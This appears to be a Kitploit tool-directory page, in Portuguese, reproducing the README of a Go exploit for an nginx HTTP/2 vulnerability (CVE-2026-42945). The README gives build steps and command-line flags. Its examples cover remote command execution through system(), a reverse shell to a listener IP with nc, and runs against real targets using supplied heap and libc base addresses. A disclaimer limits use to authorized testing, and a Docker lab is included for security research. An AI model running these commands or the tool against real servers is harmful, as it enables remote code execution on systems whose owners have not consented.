Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42945 — Ferramenta de exploração baseada em Go para CVE-2026-42945 (nginx HTTP/2) com detecção, sondagem de falhas, execução de comandos e capacidades de shell reverso para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/redcrazyghost/cve-2026-42945
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebFuzzingTestes de PenetraçãoExploração de Binários
GitHubredcrazyghost/cve-2026-42945

CVE-2026-42945

Ferramenta de exploração baseada em Go para CVE-2026-42945 (nginx HTTP/2) com detecção, sondagem de falhas, execução de comandos e capacidades de shell reverso para testes de segurança autorizados.

Ver Repositório
12há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-42945 PoC (Go)

Português | English

Ferramenta auxiliar de deteção e exploração para a implementação nginx HTTP/2 (CVE-2026-42945), utilizada para verificar a presença da vulnerabilidade em ambientes autorizados, comparar a eficácia de correções e reproduzir o comportamento do PoC em ambientes experimentais controlados.

Versões afetadas (estimativa): nginx 0.6.27 – 1.30.0; 1.30.1+ / 1.31.0+ estão corrigidas.


⚠️ Aviso de isenção de responsabilidade (leia atentamente)

Este repositório é exclusivamente para pesquisa de segurança, verificação de vulnerabilidades e testes defensivos.

  1. Autorização legal: Utilize esta ferramenta apenas em sistemas sobre os quais tenha autorização explícita por escrito ou que sejam totalmente seus. A digitalização, deteção ou ataque não autorizados a redes/servidores de terceiros é ilegal; os autores e contribuidores não assumem qualquer responsabilidade legal.
  2. Por sua conta e risco: O processo de exploração pode causar falhas no worker do serviço alvo, interrupção de negócios ou corrupção de dados. Avalie o impacto por si mesmo e realize testes preliminares em ambiente isolado.
  3. Sem garantias: Esta ferramenta é fornecida "como está", sem garantia de sucesso em qualquer ambiente de produção real; resultados de canal lateral não equivalem a RCE confirmada – a verificação independente (por exemplo, escrita de ficheiro, eco de comando, reverse shell) é obrigatória.
  4. : É proibido utilizar esta ferramenta para penetração em sistemas não autorizados, extorsão, destruição, mineração ou qualquer finalidade ilegal. Ao fazer o download, compilar ou utilizar, declara que leu e concorda com este aviso.
Proibição de uso indevido
  • Sem relação com a NGINX oficial: Este projeto é uma implementação de investigação independente e não representa a posição da NGINX oficial ou de qualquer fabricante.
  • Caso não aceite os termos acima, pare de usar imediatamente e elimine este repositório.


    Resumo de funcionalidades

    ModoDescrição
    -check-onlyVerificação de conectividade, cabeçalho Server, estimativa de versão, deteção de endpoint PoC
    -probe-crashEnvia uma sonda de overflow e avalia através de canal lateral (falha do worker)
    -cmdConstrói payload de exploit, executa comando especificado via system()
    -shellReverse shell (requer -lhost; a máquina local precisa de nc)
    -dockerTeste em lote do ambiente experimental Docker local (vuln / fixed)

    Requisitos de ambiente

    • Go ≥ 1.26 (ver go.mod)
    • Opcional: Docker + docker compose (ambiente experimental local)
    • Opcional: make, golangci-lint (desenvolvimento/verificação de código)
    • Verificação de exploração: o alvo deve expor os endpoints necessários para o PoC (ex.: GET /api/, POST /spray); as imagens Docker experimentais já os incluem

    Limitações e ambiente de aplicação

    ItemDescrição
    ProtocoloSuporta apenas HTTP em texto claro (net.Dial + bytes HTTP brutos), não suporta HTTPS/TLS. Para portas TLS como -port 443, é necessário terminação TLS prévia ou usar porta HTTP.
    Experiência DockerImagens são linux/amd64; o primeiro docker compose build compila o nginx a partir do código-fonte, demorando bastante; dentro do contentor, setarch -R desativa ASLR, diferindo muito do ambiente de produção.
    Apple SiliconO Docker local executa via platform: linux/amd64 (emulação), mais lento.
    Reverse shell-shell depende do nc do sistema; no Windows, recomenda-se escuta manual.
    Confirmação de exploraçãoCanal lateral (falha do worker) não equivale a RCE; é obrigatória verificação independente de efeitos colaterais do comando.

    Compilação

    root@kitploit:~
    # Compilação rápida (saída em bin/, ignorado pelo .gitignore)
    make build-cmd
    
    # Ou diretamente com go
    go build -o ./bin/cve-2026-42945 ./cmd
    
    # Ver versão embutida
    ./bin/cve-2026-42945 -version
    

    Binários de release: Descarregue cve-2026-42945-<os>-<arch> para a sua plataforma em Releases (construído automaticamente pelo GitHub Actions ao fazer push da tag v*).


    Guia de utilização

    Parâmetros da linha de comandos

    root@kitploit:~
    -target string      Alvo IP/hostname (padrão 127.0.0.1)
    -port int           Porta alvo (0=80; versão vulnerável Docker usa frequentemente 19321)
    -docker             Testar ambiente experimental Docker local (vuln:19321, fixed:19331)
    -check-only         Apenas deteção, sem enviar tráfego de exploit
    -probe-crash        Sonda de overflow + canal lateral de falha do worker
    -cmd string         Comando a executar via system()
    -shell              Reverse shell (requer -lhost)
    -lhost string       IP da máquina local para reverse shell
    -lport int          Porta local para reverse shell (padrão 4444)
    -docker-profile     Usar perfis de deploy/docker para bases heap/libc reais
    -heap-base string   Endereço base da heap (hexadecimal, ex.: 0x555555659000)
    -libc-base string   Endereço base da libc (hexadecimal)
    -tries int          Número de tentativas por candidato de heap (padrão 10)
    -timeout int        Timeout HTTP por pedido em segundos (padrão 5)
    -v                  Saída detalhada
    -version            Mostrar versão e sair
    

    O modo -docker não pode ser combinado com -cmd / -shell; para exploração de um único alvo, especifique -port 19321.

    1. Apenas deteção do alvo

    root@kitploit:~
    ./bin/cve-2026-42945 -target 192.168.1.10 -port 80 -check-only
    

    2. Canal lateral de falha (alvo único)

    root@kitploit:~
    ./bin/cve-2026-42945 -port 19321 -probe-crash -v
    

    3. Comparação com ambiente experimental Docker

    Primeiro, inicie os contentores experimentais:

    root@kitploit:~
    make docker-up
    # ou
    docker compose -f deploy/docker-compose.yml up -d --build
    

    A primeira compilação requer a compilação do nginx, podendo demorar alguns minutos; aguarde até que os serviços estejam healthy (docker compose ps) antes de executar make test-lab.

    ServiçoPortaDescrição
    vuln19321nginx 1.30.0 (vulnerável)
    fixed19331nginx 1.30.1 (corrigido)

    Deteção em lote:

    root@kitploit:~
    ./bin/cve-2026-42945 -docker -check-only
    ./bin/cve-2026-42945 -docker -probe-crash
    

    Ou utilize atalhos do Makefile:

    root@kitploit:~
    make test-lab          # check + probe
    make cmd-exploit       # Escreve /tmp/pwned no vuln e mostra comando de verificação
    

    4. Executar comando no Docker vuln (validação RCE)

    No contentor experimental com ASLR desativado (setarch -R) e perfis pré-definidos (-docker-profile), a taxa de sucesso é máxima:

    root@kitploit:~
    ./bin/cve-2026-42945 -port 19321 -docker-profile \
      -cmd 'echo pwned > /tmp/pwned' -v
    
    # Verificar se o ficheiro foi escrito
    docker exec nginx-rift-vuln-1.30.0 cat /tmp/pwned
    

    5. Reverse shell

    root@kitploit:~
    # Terminal 1: Iniciar ferramenta (tentará escuta nc em segundo plano)
    ./bin/cve-2026-42945 -port 19321 -docker-profile -shell -lhost 10.0.0.5 -lport 4444 -v
    
    # Se não encontrar nc, abra outro terminal para escuta manual:
    nc -lvnp 4444
    

    6. Layout de memória personalizado

    Em alvos reais com ASLR e versões de libc diferentes do Docker, é necessário divulgar ou estimar as bases:

    root@kitploit:~
    # O alvo deve estar numa porta HTTP (sem TLS)
    ./bin/cve-2026-42945 -target TARGET -port 8080 \
      -heap-base 0x555555659000 \
      -libc-base 0x7ffff77ba000 \
      -cmd 'id' -tries 20 -v
    

    Interpretação de resultados

    • [+] Canal lateral: worker anómalo: Indica apenas que o worker pode ter falhado devido a overflow; não deve ser considerado prova isolada de RCE.
    • Verificação secundária obrigatória: Verifique efeitos colaterais do comando (ficheiros, processos, docker exec, etc.).
    • Causas comuns de falha: ASLR ativado, offsets heap/libc incorretos, endpoint PoC indisponível, WAF/rate limiting, contentor precisa de restart.

    Estrutura do projeto

    root@kitploit:~
    cmd/                 Ponto de entrada principal
    internal/rift/       Lógica de deteção, construção de payload e exploração
    deploy/docker/       Imagens experimentais nginx 1.30.0 / 1.30.1
    deploy/docker-compose.yml
    .github/workflows/   Construção de releases multi-plataforma
    

    Desenvolvimento

    root@kitploit:~
    make help            # Ver todos os alvos make
    make test            # Testes unitários
    make lint            # golangci-lint
    make version         # Mostrar versão atual da compilação
    

    Publicar nova versão:

    root@kitploit:~
    git tag v1.0.0
    git push origin v1.0.0
    

    Referências

    • Repositório: https://github.com/RedCrazyGhost/CVE-2026-42945
    • CVE: CVE-2026-42945 (vulnerabilidade relacionada ao HTTP/2 do nginx; consulte o comunicado oficial)
    • Licença: Licença MIT
    • Segurança: SECURITY.md

    Lembrete final

    Utilize esta ferramenta apenas em sistemas que tenha o direito de testar. Qualquer uso indevido não é da responsabilidade dos autores.

    Baixar ferramenta